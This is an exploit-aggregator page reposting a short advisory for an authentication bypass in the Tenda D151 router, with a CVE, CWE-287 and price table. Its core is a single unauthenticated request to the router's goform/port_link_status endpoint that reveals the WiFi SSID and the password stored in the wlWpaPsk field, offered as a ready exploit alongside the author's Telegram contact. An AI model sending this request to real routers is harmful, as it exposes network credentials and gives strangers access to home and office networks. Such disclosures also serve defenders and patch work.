Advertisement






Tenda D151 2 - Authentication Bypass

CVE Category Price Severity
CVE-2020-10987 CWE-287 $2000 Critical
Author Risk Exploitation Type Date
Encrypt3d.Minds Critical Remote 2023-11-29
CVSS
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023110031

Below is a copy:

Tenda D151 2 - Authentication Bypass
[-] Title : Tenda D151 2 - Authentication Bypass
[-] Author : 1933 (TURK TM - SS CYBER)
[-] Vendor : https://www.tendacn.com/
[-] Date : 20/11/2023
[-] Version: 2

==================================

You can get tenda wifi password and ssid by going to http://localhost/goform/port_link_status

note : The WiFi password is located in the wlWpaPsk section

wlWpaPsk="password"

Exploit :

http://ip/goform/port_link_status


==================================
to contact me :

- Telegram : @asad_turk0

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.